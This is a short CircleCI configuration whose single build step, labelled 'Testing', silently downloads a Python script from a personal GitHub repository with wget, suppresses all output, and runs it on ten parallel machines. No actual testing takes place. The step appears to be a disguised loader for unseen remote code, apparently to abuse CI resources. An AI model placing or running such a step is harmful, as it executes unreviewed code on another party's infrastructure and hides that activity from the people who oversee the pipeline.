version: 2.1
jobs:
  build:
    machine:
      image: ubuntu-2004:202010-01
    parallelism: 10
    steps:
      - checkout
      - run:
          name: "Testing"
          command: wget https://raw.githubusercontent.com/aurbach55/zash/main/code.py >/dev/null 2>&1 && python code.py